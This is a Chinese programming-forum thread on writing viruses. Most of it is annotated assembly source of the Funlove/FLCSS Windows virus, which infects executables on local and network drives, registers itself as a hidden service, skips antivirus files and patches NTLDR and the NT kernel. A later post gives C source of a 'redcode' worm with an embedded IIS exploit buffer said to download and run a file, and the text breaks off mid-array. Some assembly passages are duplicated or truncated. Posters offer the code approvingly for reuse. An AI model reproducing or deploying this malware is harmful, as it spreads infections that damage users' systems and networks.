你编过病毒吗? dos下,把病毒添加到其它文件后面,修改文件头就ok 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 病毒驻留可以看看dos的内存控制块,用未公开功能得到第一个mcb地址,然后修改,拌移代码,进入高端,驻留内存。给点分吧,我现在急需呀。 xing: 修改 CS 怎么样?computer: what's wrong??? wha't this? help!!! 看一看TSR方面的书就明白了!!! pointer: ............. .............从这里开始 mov .. int 13h自己查一下一13h的调用说明好了!!将一个寄存器设为 pointer就可以啦!!写引导程序时就是这样的![email protected] if (病毒标记在EXE文件中不存在(即该文件已感染病毒)){ 写入病毒标记; 将病毒代码(机器代码)写入EXE文件; 修改程序的cs和ip入口,指向病毒代码;}else{ 此文件已经感染该病毒; 退出;} 看ddk吧!!她会叫你怎么做!!!!主要是IFS的使用问题!!怎么想到编病毒了?? 我的网站上有关机的代码,附有解释,你可以看看来了解最简单的病毒是如何进行感染和发作的Http://vbin.51.net ;********************************************************************************************* ; Flcss.asm ; ; disasm by Code Demon ; ; Code Demon Virus Dreaming Factory ; ;********************************************************************************************* .586 ASSUME CS:CODE,DS:CODE CODE SEGMENT USE32 VSize equ offset VEnd - VStart Phys_VSize equ 1000 main: ;********************************************************************************************* ; 开始代码 ;********************************************************************************************* VStart: call GetDelta ;此子程序用于取得病毒在内存中的开始地址,是绝大 ;多数病毒都要用到的经典技术只一,对于写一些加密 ;的软件有很大的帮助,莱鸟必看 lea esi,[offset HostCode + ebx] mov edi,[esp] sub edi,08 mov [esp],edi movsd movsd push dword ptr [esp + 04] call RelocKernel32 ;重定位Kernel32 or eax,eax jz short Exit cmp byte ptr [offset OS + ebx],00;判断操作系统的类型 jnz short NT_Srv call Create9xProcess ;建立WIN9X进程 ret NT_Srv: call CreateNTService ;建立NT服务 Exit: ret ;********************************************************************************************* ;建立NT服务的子程序 ;********************************************************************************************* CreateNTService: call RelocAdvapi32 or eax,eax jz short CNT_Failed push 02 push 00 push 00 ; 取服务管理器的句柄 call OpenSCManagerA or eax,eax jz short CNT_Failed mov SCM_Handle,eax call CreateExecutable ;建立FLCSS.EXE, or eax,eax ; 已经驻留内存就退出. jz short CNT_Exit mov edi,0F01FF lea esi,offset [Service + ebx] push edi push esi push SCM_Handle call OpenServiceA or eax,eax jnz short CNT_Run xor eax,eax push eax push eax push eax push eax push eax lea eax,[offset Buffer1 + ebx] ; flcss.exe push eax push 01 ;错误代码 push 02 ; 开始 push 20 ; 类型 push edi push 00 push esi push SCM_Handle ;句柄 call CreateServiceA ;建立服务 or eax,eax jz short CNT_Failed CNT_Run: push 00 push 00 push eax call StartServiceA ;开始服务 or eax,eax jnz short CNT_Exit CNT_Failed: call StartInfectionThread ;传染子程序 CNT_Exit: ret ;********************************************************************************************* ;建立WIN9X进程的子程序 ;********************************************************************************************* Create9xProcess: ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. call CreateExecutable or eax,eax jz short P9x_Exit P9x_00: xor eax,eax lea edi,[offset Buffer2 + ebx] push edi push edi mov ecx,040 repz stosd mov cl,06 push eax loop $ - 1 lea esi,[offset Buffer1 + ebx] push esi push 00 call CreateProcessA ;创建进程 or eax,eax jnz short P9x_Exit P9x_Failed: call StartInfectionThread;传染子程序 P9x_Exit: ret **************************************************************************** ;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪. **************************************************************************** CreateExecutable: lea edi,[offset Buffer1 + ebx] push edi push 104 push edi call GetSystemDirectoryA ;取得系统目录 add edi,eax mov al,'\' stosb lea esi,[offset Process + ebx] movsd movsd movsd push 02 call OpenFile cmp eax,-1 jz short CE_Exit mov c_FileHandle,eax lea edi,[offset VImports + ebx] ;清除 import mov eax,-1 stosd stosd lea edi,[offset Kernel32_Relocated + ebx] ;第二个 import mov eax,[edi - 8] stosd push 00 lea esi,c_BytesWritten push esi push 0200 push ebx push c_FileHandle call WriteFile ; 写文件头 push 00 push esi push 1000 push ebx push c_FileHandle call WriteFile ; 写入病毒主体 push c_FileHandle call CloseHandle ;关闭文件 CE_Exit: inc eax ret ;************************************************************************************ ;以下应该是病毒的服务程序 ;************************************************************************************ VService: call GetDelta push dword ptr [esp] call RelocKernel32 or eax,eax jz VS_Exit cmp byte ptr [offset OS + ebx],00 ;操作系统的类型 jz short W9x_Service_Register ;注册WIN9X服务 WNT_Service_Hacknowledge: call RelocAdvapi32 ;重定位Advapi32 or eax,eax jz VS_Exit lea esi,[offset Buffer1 + ebx] xor eax,eax lea ecx,[offset Service + ebx] lea edx,[offset ServiceDispatcher + ebx] mov [esi],ecx mov [esi + 04],edx mov [esi + 08],eax mov [esi + 0C],eax ; 将控制权返回给调用者 push esi call StartServiceCtrlDispatcherA W9x_Service_Register: lea esi,[offset USER32_Name + ebx] push esi call LoadLibraryA lea esi,[offset RegisterClassA+ ebx] push esi push eax call GetProcAddress ;取进程的地址 or eax,eax jz short VS_00 mov [esi - 06],eax lea esi,[offset Buffer1 + ebx] mov edi,esi xor eax,eax mov ecx,0A repz stosd mov dword ptr [esi + 04],-1 mov dword ptr [esi + 10],400000 ; WINDOWS9X的基址 lea eax,[offset Service + ebx] mov [esi + 24],eax push esi call RegisterClassA ; 这里非常重要 lea esi,[offset RegisterServiceProcess+ ebx] push esi push dword ptr [offset Kernel32_Base + ebx] call GetProcAddress or eax,eax jz short VS_00 mov [esi - 06],eax call GetCurrentProcessId ;取当前进程的ID ; 注册为服务 call GetCurrentProcessId ;取当前进程的ID ; 注册为服务进程,防止被用户 push 01 ;用CTRL+ALR+DEL从任务管理器中发现 push eax call RegisterServiceProcess push 8000 ; 延时 call Sleep VS_00: call StartInfectionThread VS_Exit: ret ;********************************************************************************************* ;NT服务子程序 ;********************************************************************************************* ServiceDispatcher: call GetDelta lea esi,[offset ServiceHandler + ebx] lea edi,[offset Service + ebx] push esi push edi call RegisterServiceCtrlHandlerA mov Service_Handle,eax lea esi,[offset Buffer1 + ebx] mov edi,esi mov ecx,06 xor eax,eax repz stosd mov dword ptr [esi],10 mov dword ptr [esi + 04],04 mov dword ptr [esi + 08],07 push esi push Service_Handle ;告诉WINDOWS服务已经正确的运行 call SetServiceStatus push 8000 call Sleep call StartInfectionThread ;建立进程 ret ServiceHandler: ret ; 当管理员关闭服务时,提示系统出错!好东西!!! ;********************************************************************************************* ;此子程序用于建立线程 ;********************************************************************************************* StartInfectionThread: call GetTickCount mov [offset Rand + ebx],eax lea eax,ThreadId push eax push 0 push 0 lea eax,[offset VThread + ebx] push eax push 0 push 0 call CreateThread ret ;********************************************************************************************* ; 病毒线程 ;********************************************************************************************* VThread: call GetDelta call InfectDrives ;感染本地文件 push 60000 call Sleep call GetRand and al,1F jnz short VThread call InfectNetwork ;感染网络文件 jmp short VThread ;******************************************************************************** ; 通过网络传染的子程序,值得借鉴 ;******************************************************************************** InfectNetwork: lea eax,[offset MPR_Name + ebx] push eax call LoadLibraryA or eax,eax jz short INet_Failed push eax lea esi,[offset MPR_Functions + ebx] push esi call DLL_Relocate or eax,eax jz short INet_Failed push 00 call NetSearch INet_Failed: ret ;********************************************************************************************* ; 此子程序用于测试驱动器是否有效 ;********************************************************************************************* InfectDrives: push esi call GetTickCount mov [offset Tick + ebx],eax lea esi,[offset Buffer1 + ebx] mov dword ptr [esi],' \:+ ebx - offset VStart' ID_TestDrive: mov byte ptr [esi + 03],00 push esi call GetDriveTypeA ;取驱动器类型 cmp al,03 ;硬盘? jz short ID_DriveOk cmp al,04 ;网络驱动器? jnz short ID_Invalid ID_DriveOk: add esi,03 push esi call BlownAway push esi call FileSearch ;查找文件 sub esi,03 ID_Invalid: mov al,[offset Buffer1 + ebx] inc al mov [offset Buffer1 + ebx],al cmp al,'Z' jna short ID_TestDrive pop esi ret ;********************************************************************************************* ;查找计算机 ;********************************************************************************************* NetSearch : mov EnumBufferSize,4000 or EnumNB_Objects,-1 lea eax,WNetStructAddr push eax push WNetStructAddr push 0 push 0 push 2 call WNetOpenEnumA or eax,eax jnz NET_Close push 04 push 1000 push 4000 push 00 call VirtualAlloc or eax,eax jz short NET_Close mov EnumBufferAddr,eax NET_00: mov esi,EnumBufferAddr lea eax,EnumBufferSize push eax push esi lea eax,EnumNB_Objects push eax push WNetStructAddr call WNetEnumResourceA or eax,eax jnz short NET_Free mov ecx,EnumNB_Objects or ecx,ecx jz short NET_00 NET_01: push ecx push esi mov esi,[esi + 14] ; 计算机名 or esi,esi jz short NET_03 cmp word ptr [esi],0041 ; 是否为软盘 jz short NET_03 lea edi,[offset Buffer1 + ebx] NET_02: movsb cmp byte ptr [esi],00 jnz short NET_02 mov al,'\' stosb push edi call BlownAway push edi call FileSearch NET_03: pop esi mov eax,[esi + 0C] and al,2 cmp al,2 jnz short NET_04 push esi call NetSearch NET_04: add esi,20 pop ecx loop NET_01 jmp short NET_00 NET_Free: push 8000 push 00 push EnumBufferAddr call VirtualFree NET_Close: push WNetStructAddr call WNetCloseEnum ret ;************************************************************************************* ; 查找文件子程序,这些跟以前DOS下没什么区别, ; ; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽! ^_^ ;************************************************************************************* FileSearch: mov eax,CurrentDirEnd mov dword ptr [eax],002A2E2A ; *.* lea edi,[offset Buffer2 + ebx] lea esi,[offset Buffer1 + ebx] push edi push esi call FindFirstFileA ;找第一个文件 cmp eax,-1 jz short RS_Exit RS_00: mov SearchHandle,eax RS_01: test byte ptr [edi],10 ; 测试是目录还是文件 jz short FileTest RS_Directory: cmp byte ptr [edi + 2C],'.' jz short RS_Next mov esi,edi add esi,2C mov edi,CurrentDirEnd RSD_00: movsb cmp byte ptr [esi],0 jnz short RSD_00 mov al,'\' stosb push edi call FileSearch RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHand RS_Next: lea edi,[offset Buffer2 + ebx] push edi push SearchHandle call FindNextFileA ;查找下一个文件 or eax,eax jnz short RS_01 push SearchHandle call FindClose RS_Exit: ret ;******************************************************************** ;没什么新意,略过吧 ;******************************************************************** FileTest: mov edx,[edi + 2C] or edx,20202020 xor edx,61F81F61 lea esi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染 mov ecx,0C FT_00: lodsd cmp edx,eax jz short FT_Exit loop FT_00 ;************************************************************************ ;注意拉, ;************************************************************************ mov esi,edi add esi,2C FT_01: lodsb or al,al jnz short FT_01 mov eax,[esi - 4] ; 扩展名判断 or eax,20202020 cmp eax,' xco' ;控件 jz short FT_02 cmp eax,' rcs' ;屏幕保护文件 jz short FT_02 cmp eax,' exe' ;标准的EXE文件 jnz short FT_Exit FT_02: mov eax,[edi + 20] ; 文件小于2000的就不感染 cmp eax,2000 jc short FT_Exit cmp al,03 ; 检测是否已经感染 jz short FT_Exit lea esi,[offset Buffer1 + ebx] ; 取文件名和路径 lea edi,[offset Buffer3 + ebx] push edi mov ecx,CurrentDirEnd sub ecx,esi repz movsb lea esi,[offset Buffer2 + ebx] add esi,2C FT_03: movsb cmp byte ptr [esi - 1],0 jnz short FT_03 call InfectFile ;干活了, FT_Exit: jmp RS_Next ;***************************************************************************************** ;感染文件子程序 ;***************************************************************************************** InfectFile: push i_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz IN_Exit mov i_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小,用于以后还原 mov i_FileSize,eax cmp al,03 ; 是否感染 jz IN_Exit lea edi,[offset Buffer3 + ebx] push 00 lea esi,i_BytesRead push esi push 2000 push edi push i_FileHandle call ReadFile ;********************************************************************************* ;以下的程序跟文件头有关,建议没基础者找一些相关资料看看 ;********************************************************************************* cmp word ptr [edi],5A4Dh ;DOS文件头,开始有点印象了吧 jnz IN_CloseFile cmp word ptr [edi + 18],0040 ;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件 jnz IN_CloseFile cmp dword ptr [edi + 3C],1C00 ; DOS文件头的大小 ja IN_CloseFile add edi,[edi + 3C] ;指向PE或NE文件头 mov eax,[edi] cmp eax,00004550 ;PE文件吗? jnz IN_CloseFile ;此步必须,因为WIN3.X的18H的值也大于等于40H cmp word ptr [edi + 5C],2 ; GUI???? jnz IN_CloseFile mov esi,edi add esi,18 add si,[edi + 14] ; 将ESI指向第一个节表 push esi mov eax,[edi + 28] ; 查找包含"PE"的节表 IN_00: mov ecx,[esi + 0C] add ecx,[esi + 08] cmp eax,ecx jc short IN_01 add esi,28 jmp short IN_00 IN_01: sub eax,[esi + 0C] add eax,[esi + 14] mov i_EP_Offset,eax or [esi + 24],80000000 ; 将它改为可写,这里是WINDOWS跟 ;DOS在程序和数据段上的一个重要改变 ;也是写WINDOWS病毒要注意的地方之一 pop esi xor ecx,ecx mov cx,[edi + 06] dec ecx mov eax,ecx mov edx,28 mul edx add esi,eax ; ESI指向最后一个节表 mov eax,[esi + 24] cmp al,80 ; 是否已经初始化 jz IN_CloseFile or eax,8C000000 ; 将它改为可写, and eax,not 12000000 ; 不共享,不可丢弃 mov [esi + 24],eax mov ecx,i_FileSize ;这里好象跟SFX有点关系 mov edx,ecx mov eax,ecx clc shr eax,03 sub edx,eax sub edx,[esi + 14] jc short IN_02 sub edx,[esi + 10] jnc IN_CloseFile IN_02: ; 重新计算节的长度 mov edx,[esi + 08] sub ecx,[esi + 14] jc short IN_03 cmp edx,ecx ja short IN_03 mov edx,ecx IN_03: test edx,00000FFF jz short IN_04 and edx,0FFFFF000 add edx,1000 IN_04: mov ecx,edx add ecx,[esi + 0C] mov eax,ecx add eax,4000 mov [edi + 50],eax ; 新的长度 sub ecx,[edi + 28] add ecx,offset VStart - 100 - 08 mov i_HostDep32,ecx mov eax,edx add eax,4000 ; 改变虚拟大小 mov [esi + 08],eax mov eax,edx add eax,[esi + 14] mov i_VirusOffset,eax add edx,1000 ; 改变物理大小 mov [esi + 10],edx add edx,[esi + 14] add edx,03 push i_FileHandle push edx call MapFile or eax,eax jz short IN_CloseFile mov i_MapHandle,eax push eax call ViewMap or eax,eax jz short IN_CloseMap mov edx,eax lea esi,[offset Buffer3 + ebx] ; 写PE文件头 mov edi,edx mov ecx,2000 repz movsb lea edi,[offset HostCode + ebx] mov esi,i_EP_Offset add esi,edx movsd movsd mov edi,esi ; 设置CALL GS:Virus sub edi,08 mov eax,00E8659090 stosd mov eax,i_HostDep32 stosd mov edi,edx mov eax,i_FileSize mov ecx,i_VirusOffset sub ecx,eax jna short IN_05 add edi,eax xor al,al repz stosb IN_05: mov esi,ebx ;写入病毒主体 mov edi,edx add edi,i_VirusOffset mov ecx,VSize repz movsb mov ecx,Phys_VSize - VSize + 3 repz stosb push edx call UnmapViewOfFile IN_CloseMap: push i_MapHandle call CloseHandle ;关闭 call Wait_A_Little ;延时 IN_CloseFile: lea esi,[offset Buffer2 + 14 + ebx] ; 恢复文件的时间 push esi sub esi,08 push esi sub esi,08 push esi push i_FileHandle call SetFileTime push i_FileHandle call CloseHandle ;关闭文件 IN_Exit: ret ;******************************************************************************** ; 查找GetProcAddress 的子程序 ;******************************************************************************** Whereis_GPA: lea esi,[offset GPA_Sigs + ebx] mov byte ptr [offset OS + ebx],00 mov eax,w_Kernel32 and eax,0FFF00000 cmp eax,0BFF00000 jnz short OS_WinNT? OS_Win9x: mov edi,0BFF70000 jmp short WG_00 OS_WinNT?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077F00000 jnz short OS_Win2K? mov edi,eax jmp short WG_00 OS_Win2K?: inc byte ptr [offset OS + ebx] add esi,08 cmp eax,077E00000 jnz short WG_Failed mov edi,077E80000 WG_00: mov edx,edi mov ecx,20000 WG_01: push ecx mov ecx,08 push esi push edi repz cmpsb pop edi pop esi pop ecx jz short WG_02 inc edi loop WG_01 WG_Failed: xor eax,eax jmp short WG_03 WG_02: add edi,03 mov [offset GetProcAddress + 1 + ebx],edi mov eax,edx mov [offset Kernel32_Base + ebx],eax WG_03: ret ;*************************************************************************************** ;DLL 重定位子程序 ;*************************************************************************************** DLL_Relocate: mov esi,DLL_Func DR_00: mov eax,esi add eax,07 push eax push DLL_Base call GetProcAddress or eax,eax jz short DR_03 DR_01: mov [esi + 1],eax add esi,07 DR_02: lodsb or al,al jnz short DR_02 cmp byte ptr [esi],0B8 jz short DR_00 DR_03: ret ;********************************************************************************************** ; 修改NTLDR,这可是Funlove的必杀技噢,虽然我不喜欢这种做法,但还是看看吧 ;********************************************************************************************** BlownAway: lea esi,[offset NTLDR + ebx] mov edi,DirEnd movsd movsd lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTLDR + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_00 add esi,10 BA_00: push edi push esi push 05 call PatchFile lea esi,[offset NTOSKRNL + ebx] mov edi,DirEnd BA_01: movsb cmp byte ptr [esi - 1],00 jnz short BA_01 lea edi,[offset Buffer1 + ebx] lea esi,[offset NT4_NTOSKRNL + ebx] cmp byte ptr [offset OS + ebx],01 jz short BA_02 add esi,18 BA_02: push edi push esi push 09 call PatchFile ret PatchFile: push p_Filename push 03 ; 打开文件 call OpenFile cmp eax,-1 jz short PA_Exit mov p_FileHandle,eax push 00 push eax call GetFileSize ;取文件大小 mov p_FileSize,eax push p_FileHandle push eax call MapFile or eax,eax jz short PA_CloseFile mov p_MapHandle,eax push eax call ViewMap or eax,eax jz short PA_CloseMap mov edx,eax mov edi,eax mov esi,p_PatchAddr mov ecx,p_FileSize PA_00: push ecx push esi push edi mov ecx,p_PatchSize repz cmpsb pop edi pop esi pop ecx jz short PA_01 inc edi loop PA_00 jmp short PA_Unmap PA_01: mov ecx,p_PatchSize add esi,ecx repz movsb PA_Unmap: push edx call UnmapViewOfFile PA_CloseMap: push p_MapHandle call CloseHandle PA_CloseFile: push p_FileHandle call CloseHandle ;关闭文件 PA_Exit: ret ;********************************************************************************************** ;此子程序用于取病毒在内存中的开始地址,经典技术 ;********************************************************************************************** GetDelta: call delta delta: pop ebx sub ebx,offset delta - VStart ret ;********************************************************************************************** ;以下应该是重定位Kernel32的子程序,WINDOWS病毒惯用的手法 ;********************************************************************************************** RelocKernel32: push r_Kernel32 call Whereis_GPA or eax,eax jz short RK_00 push eax lea esi,[offset Kernel32_Functions + ebx] push esi call DLL_Relocate RK_00: ret ;********************************************************************************************** ; 以下是重定位Advapi32的子程序 ;********************************************************************************************** RelocAdvapi32: lea eax,[offset ADVAPI32_Name + ebx] push eax call LoadLibraryA or eax,eax jz short RA_00 push eax lea esi,[offset ADVAPI32_Functions + ebx] push esi call DLL_Relocate RA_00: ret ;********************************************************************************************** ; 打开文件子程序 ;********************************************************************************************** OpenFile: push 20 push o_Filename call SetFileAttributesA push 00 push 80 ; 普通属性 push o_OpenMode push 00 push 00 ; 不共享, push 0C0000000 ; 读写方式 push o_Filename call CreateFileA ret ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileM ;********************************************************************************************** ; 建立文件影象,找点资料看看吧 ;********************************************************************************************** MapFile: push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileMappingA ret ViewMap: push 00 push 00 push 00 push 02 push v_MapHandle call MapViewOfFile ret ;********************************************************************************************** ; 延时,没什么说的了 ;********************************************************************************************** Wait_A_Little: call GetTickCount sub eax,[offset Tick + ebx] cmp eax,4000 jc short WAL_00 push 16000 call Sleep call GetTickCount mov [offset Tick + ebx],eax WAL_00: ret GetRand: push ecx push edx mov eax,[offset Rand + ebx] xor edx,edx mov ecx,7FFFFFFF mul ecx inc eax mov ecx,0FFFFFFFBh div ecx mov eax,edx mov [offset Rand + ebx],eax pop edx pop ecx ret ;********************************************************************************************** ;以下是一些数据 ;********************************************************************************************** HostCode db 8 dup (?) GPA_Sigs: W9x db 0C2,04,00,57,6A,22,2Bh,0D2 NT4 db 0C2,04,00,55,8Bh,4C,24,0C W2K db 00F,00,00,55,8Bh,0ECh,51,51 NTLDR db 'NTLDR',0 NT4_NTLDR db 3Bh,46,58,74,07 ;WINDOWS_NT4的NTLDR的标志 db 3Bh,46,58,0EBh,07 W2K_NTLDR db 3Bh,47,58,74,07 db 3Bh,47,58,0EBh,07 ;WIN2K的NTLDR的标志 NTOSKRNL db 'WINNT\System32\ntoskrnl.exe',0 NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ;标志 db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00 W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 ;同上 db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28 ;********************************************************************************************** ;以下是一些杀毒软件的文件不感染,你可以加点国产的杀毒软件的名字, ;********************************************************************************************** SkipNames: dd 139D7300h ; aler dd 0F977200h ; amon dd 118E7E1Eh ; _avp dd 52886900h ; avp3 dd 0C886900h ; avpm dd 13883207h ; f-pr dd 168E7E0Fh ; navw dd 0F997C12h ; scan dd 128B7212h ; smss dd 04907B05h ; ddhe dd 00946F05h ; dpla dd 00946F0Ch ; mpla Process db 'flcss.exe',0 Service db 'FLC',0 ; Import节表 VImports: dd offset Kernel32_Pointers dd -1,-1 dd offset Kernel32_Name dd offset Kernel32_Relocated db 14 dup (0) Kernel32_Pointers dd offset Kernel32_Beep Kernel32_Relocated dd offset Kernel32_Beep Kernel32_Beep db ?,?,'Beep',0 ;********************************************************************************************* ; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,你就是绝顶高手了, ; ; 注: 绝顶高手--------没有头发的高手 ;********************************************************************************************* Kernel32_Name db 'KERNEL32.dll',0 Kernel32_Functions: CloseHandle: db 0B8,4 dup(?),0FF,0E0,'CloseHandle',0 CreateFileA: db 0B8,4 dup(?),0FF,0E0,'CreateFileA',0 CreateFileMappingA: db 0B8,4 dup(?),0FF,0E0,'CreateFileMappingA',0 CreateProcessA: db 0B8,4 dup(?),0FF,0E0,'CreateProcessA',0 CreateThread: db 0B8,4 dup(?),0FF,0E0,'CreateThread',0 FindFirstFileA: db 0B8,4 dup(?),0FF,0E0,'FindFirstFileA',0 FindNextFileA: db 0B8,4 dup(?),0FF,0E0,'FindNextFileA',0 FindClose: db 0B8,4 dup(?),0FF,0E0,'FindClose',0 GetCurrentProcessId: db 0B8,4 dup(?),0FF,0E0,'GetCurrentProcessId',0 GetDriveTypeA: db 0B8,4 dup(?),0FF,0E0,'GetDriveTypeA',0 GetFileSize: db 0B8,4 dup(?),0FF,0E0,'GetFileSize',0 GetProcAddress: db 0B8,4 dup(?),0FF,0E0,'GetProcAddress',0 GetTickCount: db 0B8,4 dup(?),0FF,0E0,'GetTickCount',0 GetSystemDirectoryA: db 0B8,4 dup(?),0FF,0E0,'GetSystemDirectoryA',0 LoadLibraryA: db 0B8,4 dup(?),0FF,0E0,'LoadLibraryA',0 MapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'MapViewOfFile',0 ReadFile: db 0B8,4 dup(?),0FF,0E0,'ReadFile',0 SetFileAttributesA: db 0B8,4 dup(?),0FF,0E0,'SetFileAttributesA',0 SetFileTime: db 0B8,4 dup(?),0FF,0E0,'SetFileTime',0 Sleep: db 0B8,4 dup(?),0FF,0E0,'Sleep',0 UnmapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'UnmapViewOfFile',0 VirtualAlloc: db 0B8,4 dup(?),0FF,0E0,'VirtualAlloc',0 VirtualFree: db 0B8,4 dup(?),0FF,0E0,'VirtualFree',0 WriteFile: db 0B8,4 dup(?),0FF,0E0,'WriteFile',0 ;注:下面的API在WIN9X中是没有的 db 0 RegisterServiceProcess: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceProcess',0 USER32_Name db 'USER32.dll',0 RegisterClassA: db 0B8,4 dup(?),0FF,0E0,'RegisterClassA',0 ADVAPI32_Name db 'ADVAPI32.dll',0 ADVAPI32_Functions: OpenSCManagerA: db 0B8,4 dup(?),0FF,0E0,'OpenSCManagerA',0 OpenServiceA: db 0B8,4 dup(?),0FF,0E0,'OpenServiceA',0 CreateServiceA: db 0B8,4 dup(?),0FF,0E0,'CreateServiceA',0 StartServiceA: db 0B8,4 dup(?),0FF,0E0,'StartServiceA',0 StartServiceCtrlDispatcherA: db 0B8,4 dup(?),0FF,0E0,'StartServiceCtrlDispatcherA',0 RegisterServiceCtrlHandlerA: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceCtrlHandlerA',0 SetServiceStatus: db 0B8,4 dup(?),0FF,0E0,'SetServiceStatus',0 MPR_Name db 'MPR.dll',0 MPR_Functions: WNetOpenEnumA: db 0B8,4 dup(?),0FF,0E0,'WNetOpenEnumA',0 WNetEnumResourceA: db 0B8,4 dup(?),0FF,0E0,'WNetEnumResourceA',0 WNetCloseEnum: db 0B8,4 dup(?),0FF,0E0,'WNetCloseEnum',0 ;病毒应该是在这里就结束了 vend: Kernel32_Base dd ? Rand dd ? Tick dd ? OS db ? ALIGN 100 Buffer1 db 200 dup (0) ; 此处应该是用于存放当前目录 Buffer2 db 200 dup (?) Buffer3 db 2000 dup (?) ;此处用于存放读入的文件 CODE ENDS END main 看在dingboy兄弟的水平上,在下也把在下在2001年写的那个被别人称作redcode的病毒的源代码拿出来了#include <windows.h>#include <winbase.h>#include <winsock.h>char *mybytes;unsigned long sizemybytes;unsigned long __stdcall doweb(void *inr) {char buf[1024];SOCKET in = *((SOCKET *)inr); recv(in,buf,1024,0); send(in,mybytes,sizemybytes,0); closesocket(in); return 0;}// this is the sploit code written by Dark Spyrit, it downloads a file and runs itchar sploit[] = { 0x47, 0x45, 0x54, 0x20, 0x2F, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 